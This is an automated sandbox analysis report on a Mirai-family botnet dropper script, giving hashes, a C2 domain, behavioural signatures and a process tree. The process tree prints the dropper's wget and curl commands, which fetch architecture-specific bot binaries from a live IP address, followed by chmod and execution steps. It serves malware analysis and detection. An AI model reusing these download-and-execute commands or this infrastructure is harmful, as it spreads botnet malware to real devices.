Analysis
max time kernel: 115s
max time network: 150s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 19-12-2024 07:08
Static task: static1
Behavioral task: behavioral1 (sample feelme420.sh, resource ubuntu1804-amd64-20240611-en)
Behavioral task: behavioral2 (sample feelme420.sh, resource debian9-armhf-20240611-en)
Behavioral task: behavioral3 (sample feelme420.sh, resource debian9-mipsbe-20240418-en)
Behavioral task: behavioral4 (sample feelme420.sh, resource debian9-mipsel-20240226-en)
General
Target: feelme420.sh
Size: 3KB
MD5: 22e9d65b991f00de3a52071664dc52f9
SHA1: 2b6dd972572c4c72ecf43bb7b66eebe776cd0360
SHA256: 7c31b6f7e29de978c261d41059788662d9d53faf08be61330e611eedcd46d33b
SHA512: eefb50d98fc847673e4c38177789e26ee89ec7f027ec5ec92a842470638a84300f378cf10120afab26fe5a87de34c6616f33fc389be816b4763f0fea0eff18cb
Malware Config
Extracted (mirai): chernobyl.stressing.world
Signatures
Mirai family
Contacts a large (12958) amount of remote hosts  (1 TTPs)
  This may indicate a network scan to discover remotely running services.
File and Directory Permissions Modification  (1 TTPs, 16 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid   Process
  1544  chmod
  1586  chmod
  1596  chmod
  1626  chmod
  1646  chmod
  1534  chmod
  1574  chmod
  1554  chmod
  1606  chmod
  1616  chmod
  1636  chmod
  1656  chmod
  1514  chmod
  1524  chmod
  1564  chmod
  1666  chmod
Executes dropped EXE  (16 IoCs)
  ioc             pid   Process
  /tmp/f331m3420  1515  f331m3420
  /tmp/f331m3420  1525  f331m3420
  /tmp/f331m3420  1535  f331m3420
  /tmp/f331m3420  1545  f331m3420
  /tmp/f331m3420  1555  f331m3420
  /tmp/f331m3420  1565  f331m3420
  /tmp/f331m3420  1575  f331m3420
  /tmp/f331m3420  1587  f331m3420
  /tmp/f331m3420  1597  f331m3420
  /tmp/f331m3420  1607  f331m3420
  /tmp/f331m3420  1617  f331m3420
  /tmp/f331m3420  1627  f331m3420
  /tmp/f331m3420  1637  f331m3420
  /tmp/f331m3420  1647  f331m3420
  /tmp/f331m3420  1657  f331m3420
  /tmp/f331m3420  1667  f331m3420
Modifies Watchdog functionality  (1 TTPs, 32 IoCs)
  Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  description                   ioc                 Process    rows
  File opened for modification  /dev/watchdog       f331m3420  16
  File opened for modification  /dev/misc/watchdog  f331m3420  16
Creates a large amount of network flows  (1 TTPs)
  This may indicate a network scan to discover remotely running services.
Enumerates active TCP sockets  (1 TTPs, 15 IoCs)
  Gets active TCP sockets from /proc virtual filesystem.
  description              ioc            Process    rows
  File opened for reading  /proc/net/tcp  f331m3420  15
Enumerates running processes
  Discovers information about currently running processes on the system
Writes file to system bin folder  (32 IoCs)
  description                   ioc             Process    rows
  File opened for modification  /sbin/watchdog  f331m3420  16
  File opened for modification  /bin/watchdog   f331m3420  16
Reads process memory  (1 TTPs, 26 IoCs)
  Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
  description              ioc             Process
  File opened for reading  /proc/448/maps  f331m3420
  File opened for reading  /proc/461/maps  f331m3420
  File opened for reading  /proc/462/maps  f331m3420
  File opened for reading  /proc/549/maps  f331m3420
  File opened for reading  /proc/671/maps  f331m3420
  File opened for reading  /proc/446/maps  f331m3420
  File opened for reading  /proc/464/maps  f331m3420
  File opened for reading  /proc/475/maps  f331m3420
  File opened for reading  /proc/516/maps  f331m3420
  File opened for reading  /proc/535/maps  f331m3420
  File opened for reading  /proc/547/maps  f331m3420
  File opened for reading  /proc/416/maps  f331m3420
  File opened for reading  /proc/454/maps  f331m3420
  File opened for reading  /proc/467/maps  f331m3420
  File opened for reading  /proc/469/maps  f331m3420
  File opened for reading  /proc/517/maps  f331m3420
  File opened for reading  /proc/581/maps  f331m3420
  File opened for reading  /proc/685/maps  f331m3420
  File opened for reading  /proc/449/maps  f331m3420
  File opened for reading  /proc/474/maps  f331m3420
  File opened for reading  /proc/482/maps  f331m3420
  File opened for reading  /proc/494/maps  f331m3420
  File opened for reading  /proc/606/maps  f331m3420
  File opened for reading  /proc/607/maps  f331m3420
  File opened for reading  /proc/703/maps  f331m3420
  File opened for reading  /proc/460/maps  f331m3420
Changes its process name  (16 IoCs)
  description (all rows): Changes the process name, possibly in an attempt to hide itself
  ioc  pid   Process
  a    1515  f331m3420
  a    1525  f331m3420
  a    1535  f331m3420
  a    1545  f331m3420
  a    1555  f331m3420
  a    1565  f331m3420
  a    1575  f331m3420
  a    1587  f331m3420
  a    1597  f331m3420
  a    1607  f331m3420
  a    1617  f331m3420
  a    1627  f331m3420
  a    1637  f331m3420
  a    1647  f331m3420
  a    1657  f331m3420
  a    1667  f331m3420
Reads system network configuration  (1 TTPs, 15 IoCs)
  Uses contents of /proc filesystem to enumerate network settings.
  description              ioc            Process    rows
  File opened for reading  /proc/net/tcp  f331m3420  15
System Network Configuration Discovery  (1 TTPs, 2 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid   Process
  1518  wget
  1522  curl
Writes file to tmp directory  (31 IoCs)
  Malware often drops required files in the /tmp directory.
  description                   ioc                    Process
  File opened for modification  /tmp/feelme420.i586    curl
  File opened for modification  /tmp/feelme420.sh4     wget
  File opened for modification  /tmp/feelme420.sh4     curl
  File opened for modification  /tmp/feelme420.x86_64  wget
  File opened for modification  /tmp/feelme420.i686    wget
  File opened for modification  /tmp/feelme420.i486    wget
  File opened for modification  /tmp/feelme420.arm     curl
  File opened for modification  /tmp/feelme420.ppc     wget
  File opened for modification  /tmp/feelme420.m68k    wget
  File opened for modification  /tmp/feelme420.spc     curl
  File opened for modification  /tmp/feelme420.mips    wget
  File opened for modification  /tmp/feelme420.mpsl    curl
  File opened for modification  /tmp/feelme420.m68k    curl
  File opened for modification  /tmp/feelme420.arc     curl
  File opened for modification  /tmp/feelme420.mips    curl
  File opened for modification  /tmp/feelme420.arm6    wget
  File opened for modification  /tmp/feelme420.i686    curl
  File opened for modification  /tmp/feelme420.arm7    curl
  File opened for modification  /tmp/feelme420.ppc     curl
  File opened for modification  /tmp/feelme420.spc     wget
  File opened for modification  /tmp/feelme420.arc     wget
  File opened for modification  /tmp/feelme420.x86     wget
  File opened for modification  /tmp/feelme420.arm5    wget
  File opened for modification  /tmp/feelme420.arm7    wget
  File opened for modification  /tmp/feelme420.i486    curl
  File opened for modification  /tmp/f331m3420         feelme420.sh
  File opened for modification  /tmp/feelme420.arm5    curl
  File opened for modification  /tmp/feelme420.arm6    curl
  File opened for modification  /tmp/feelme420.x86_64  curl
  File opened for modification  /tmp/feelme420.x86     curl
  File opened for modification  /tmp/feelme420.mpsl    wget
Processes
/tmp/feelme420.sh  PID:1507
  cmd: /tmp/feelme420.sh
  - Writes file to tmp directory
    /usr/bin/wget  PID:1508
      cmd: wget http://94.23.167.188/F331M3/feelme420.x86
      - Writes file to tmp directory
    /usr/bin/curl  PID:1512
      cmd: curl -O http://94.23.167.188/F331M3/feelme420.x86
      - Writes file to tmp directory
    /bin/cat  PID:1513
      cmd: cat feelme420.x86
    /bin/chmod  PID:1514
      cmd: chmod +x config-err-N4UXNv f331m3420 feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR3
      - File and Directory Permissions Modification
    /tmp/f331m3420  PID:1515
      cmd: ./f331m3420 feelme420.exploit
      - Executes dropped EXE
      - Modifies Watchdog functionality
      - Writes file to system bin folder
      - Changes its process name
    /usr/bin/wget  PID:1518
      cmd: wget http://94.23.167.188/F331M3/feelme420.mips
      - System Network Configuration Discovery
      - Writes file to tmp directory
    /usr/bin/curl  PID:1522
      cmd: curl -O http://94.23.167.188/F331M3/feelme420.mips
      - System Network Configuration Discovery
      - Writes file to tmp directory
    /bin/chmod  PID:1524
      cmd: chmod +x config-err-N4UXNv f331m3420 feelme420.mips feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR3
      - File and Directory Permissions Modification
    /tmp/f331m3420  PID:1525
      cmd: ./f331m3420 feelme420.exploit
      - Executes dropped EXE
      - Modifies Watchdog functionality
      - Enumerates active TCP sockets
      - Writes file to system bin folder
      - Changes its process name
      - Reads system network configuration
    /usr/bin/wget  PID:1528
      cmd: wget http://94.23.167.188/F331M3/feelme420.mpsl
      - Writes file to tmp directory
    /usr/bin/curl  PID:1532
      cmd: curl -O http://94.23.167.188/F331M3/feelme420.mpsl
      - Writes file to tmp directory
    /bin/chmod  PID:1534
      cmd: chmod +x config-err-N4UXNv f331m3420 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR3
      - File and Directory Permissions Modification
    /tmp/f331m3420  PID:1535
      cmd: ./f331m3420 feelme420.exploit
      - Executes dropped EXE
      - Modifies Watchdog functionality
      - Enumerates active TCP sockets
      - Writes file to system bin folder
      - Changes its process name
      - Reads system network configuration
    /usr/bin/wget  PID:1538
      cmd: wget http://94.23.167.188/F331M3/feelme420.arm
    /usr/bin/curl  PID:1542
      cmd: curl -O http://94.23.167.188/F331M3/feelme420.arm
      - Writes file to tmp directory
    /bin/chmod  PID:1544
      cmd: chmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR3
      - File and Directory Permissions Modification
    /tmp/f331m3420  PID:1545
      cmd: ./f331m3420 feelme420.exploit
      - Executes dropped EXE
      - Modifies Watchdog functionality
      - Enumerates active TCP sockets
      - Writes file to system bin folder
      - Changes its process name
      - Reads system network configuration
    /usr/bin/wget  PID:1548
      cmd: wget http://94.23.167.188/F331M3/feelme420.arm5
      - Writes file to tmp directory
    /usr/bin/curl  PID:1552
      cmd: curl -O http://94.23.167.188/F331M3/feelme420.arm5
      - Writes file to tmp directory
    /bin/chmod  PID:1554
      cmd: chmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR3
      - File and Directory Permissions Modification
    /tmp/f331m3420  PID:1555
      cmd: ./f331m3420 feelme420.exploit
      - Executes dropped EXE
      - Modifies Watchdog functionality
      - Enumerates active TCP sockets
      - Writes file to system bin folder
      - Changes its process name
      - Reads system network configuration
    /usr/bin/wget  PID:1558
      cmd: wget http://94.23.167.188/F331M3/feelme420.arm6
      - Writes file to tmp directory
    /usr/bin/curl  PID:1562
      cmd: curl -O http://94.23.167.188/F331M3/feelme420.arm6
      - Writes file to tmp directory
    /bin/chmod  PID:1564
      cmd: chmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR3
      - File and Directory Permissions Modification
    /tmp/f331m3420  PID:1565
      cmd: ./f331m3420 feelme420.exploit
      - Executes dropped EXE
      - Modifies Watchdog functionality
      - Enumerates active TCP sockets
      - Writes file to system bin folder
      - Changes its process name
      - Reads system network configuration
    /usr/bin/wget  PID:1568
      cmd: wget http://94.23.167.188/F331M3/feelme420.arm7
      - Writes file to tmp directory
    /usr/bin/curl  PID:1572
      cmd: curl -O http://94.23.167.188/F331M3/feelme420.arm7
      - Writes file to tmp directory
    /bin/chmod  PID:1574
      cmd: chmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR3
      - File and Directory Permissions Modification
    /tmp/f331m3420  PID:1575
      cmd: ./f331m3420 feelme420.exploit
      - Executes dropped EXE
      - Modifies Watchdog functionality
      - Enumerates active TCP sockets
      - Writes file to system bin folder
      - Changes its process name
      - Reads system network configuration
    /usr/bin/wget  PID:1580
      cmd: wget http://94.23.167.188/F331M3/feelme420.ppc
      - Writes file to tmp directory
    /usr/bin/curl  PID:1584
      cmd: curl -O http://94.23.167.188/F331M3/feelme420.ppc
      - Writes file to tmp directory
    /bin/chmod  PID:1586
      cmd: chmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9
      - File and Directory Permissions Modification
    /tmp/f331m3420  PID:1587
      cmd: ./f331m3420 feelme420.exploit
      - Executes dropped EXE
      - Modifies Watchdog functionality
      - Enumerates active TCP sockets
      - Writes file to system bin folder
      - Changes its process name
      - Reads system network configuration
    /usr/bin/wget  PID:1590
      cmd: wget http://94.23.167.188/F331M3/feelme420.m68k
      - Writes file to tmp directory
    /usr/bin/curl  PID:1594
      cmd: curl -O http://94.23.167.188/F331M3/feelme420.m68k
      - Writes file to tmp directory
    /bin/chmod  PID:1596
      cmd: chmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9
      - File and Directory Permissions Modification
    /tmp/f331m3420  PID:1597
      cmd: ./f331m3420 feelme420.exploit
      - Executes dropped EXE
      - Modifies Watchdog functionality
      - Enumerates active TCP sockets
      - Writes file to system bin folder
      - Changes its process name
      - Reads system network configuration
    /usr/bin/wget  PID:1600
      cmd: wget http://94.23.167.188/F331M3/feelme420.sh4
      - Writes file to tmp directory
    /usr/bin/curl  PID:1604
      cmd: curl -O http://94.23.167.188/F331M3/feelme420.sh4
      - Writes file to tmp directory
    /bin/chmod  PID:1606
      cmd: chmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9
      - File and Directory Permissions Modification
    /tmp/f331m3420  PID:1607
      cmd: ./f331m3420 feelme420.exploit
      - Executes dropped EXE
      - Modifies Watchdog functionality
      - Enumerates active TCP sockets
      - Writes file to system bin folder
      - Changes its process name
      - Reads system network configuration
    /usr/bin/wget  PID:1610
      cmd: wget http://94.23.167.188/F331M3/feelme420.spc
      - Writes file to tmp directory
    /usr/bin/curl  PID:1614
      cmd: curl -O http://94.23.167.188/F331M3/feelme420.spc
      - Writes file to tmp directory
    /bin/chmod  PID:1616
      cmd: chmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9
      - File and Directory Permissions Modification
    /tmp/f331m3420  PID:1617
      cmd: ./f331m3420 feelme420.exploit
      - Executes dropped EXE
      - Modifies Watchdog functionality
      - Enumerates active TCP sockets
      - Writes file to system bin folder
      - Changes its process name
      - Reads system network configuration
    /usr/bin/wget  PID:1620
      cmd: wget http://94.23.167.188/F331M3/feelme420.arc
      - Writes file to tmp directory
    /usr/bin/curl  PID:1624
      cmd: curl -O http://94.23.167.188/F331M3/feelme420.arc
      - Writes file to tmp directory
    /bin/chmod  PID:1626
      cmd: chmod +x config-err-N4UXNv f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9
      - File and Directory Permissions Modification
    /tmp/f331m3420  PID:1627
      cmd: ./f331m3420 feelme420.exploit
      - Executes dropped EXE
      - Modifies Watchdog functionality
      - Enumerates active TCP sockets
      - Writes file to system bin folder
      - Changes its process name
      - Reads system network configuration
    /usr/bin/wget  PID:1630
      cmd: wget http://94.23.167.188/F331M3/feelme420.x86_64
      - Writes file to tmp directory
    /usr/bin/curl  PID:1634
      cmd: curl -O http://94.23.167.188/F331M3/feelme420.x86_64
      - Writes file to tmp directory
    /bin/chmod  PID:1636
      cmd: chmod +x config-err-N4UXNv f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9
      - File and Directory Permissions Modification
    /tmp/f331m3420  PID:1637
      cmd: ./f331m3420 feelme420.exploit
      - Executes dropped EXE
      - Modifies Watchdog functionality
      - Enumerates active TCP sockets
      - Writes file to system bin folder
      - Changes its process name
      - Reads system network configuration
    /usr/bin/wget  PID:1640
      cmd: wget http://94.23.167.188/F331M3/feelme420.i686
      - Writes file to tmp directory
    /usr/bin/curl  PID:1644
      cmd: curl -O http://94.23.167.188/F331M3/feelme420.i686
      - Writes file to tmp directory
    /bin/chmod  PID:1646
      cmd: chmod +x config-err-N4UXNv f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9
      - File and Directory Permissions Modification
    /tmp/f331m3420  PID:1647
      cmd: ./f331m3420 feelme420.exploit
      - Executes dropped EXE
      - Modifies Watchdog functionality
      - Enumerates active TCP sockets
      - Writes file to system bin folder
      - Changes its process name
      - Reads system network configuration
    /usr/bin/wget  PID:1650
      cmd: wget http://94.23.167.188/F331M3/feelme420.i486
      - Writes file to tmp directory
    /usr/bin/curl  PID:1654
      cmd: curl -O http://94.23.167.188/F331M3/feelme420.i486
      - Writes file to tmp directory
    /bin/chmod  PID:1656
      cmd: chmod +x config-err-N4UXNv f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9
      - File and Directory Permissions Modification
    /tmp/f331m3420  PID:1657
      cmd: ./f331m3420 feelme420.exploit
      - Executes dropped EXE
      - Modifies Watchdog functionality
      - Enumerates active TCP sockets
      - Writes file to system bin folder
      - Changes its process name
      - Reads system network configuration
    /usr/bin/wget  PID:1660
      cmd: wget http://94.23.167.188/F331M3/feelme420.i586
    /usr/bin/curl  PID:1664
      cmd: curl -O http://94.23.167.188/F331M3/feelme420.i586
      - Writes file to tmp directory
    /bin/chmod  PID:1666
      cmd: chmod +x config-err-N4UXNv f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i586 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9
      - File and Directory Permissions Modification
    /tmp/f331m3420  PID:1667
      cmd: ./f331m3420 feelme420.exploit
      - Executes dropped EXE
      - Modifies Watchdog functionality
      - Enumerates active TCP sockets
      - Writes file to system bin folder
      - Reads process memory
      - Changes its process name
      - Reads system network configuration
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
  File and Directory Permissions Modification (1)
    Linux and Mac File and Directory Permissions Modification (1)
  Impair Defenses (1)
Downloads
Filesize: 68KB
MD5: 71b0c2e7cc122d6de4a481bea5ebc6d9
SHA1: f982ae244188ddd93b797e9548e049b97d2f2c7f
SHA256: de0eaed88adb239921c42f1f8038523d53c735f01992fe773f54e1d181750833
SHA512: f38ed5895d7c420b15688de521df6fc394ae9e1690a5f3628f22bd6489dab21ec8e9fa6dcfca40082d5099763d10b680bba3b43ef6f71016132958aa9a0d7f43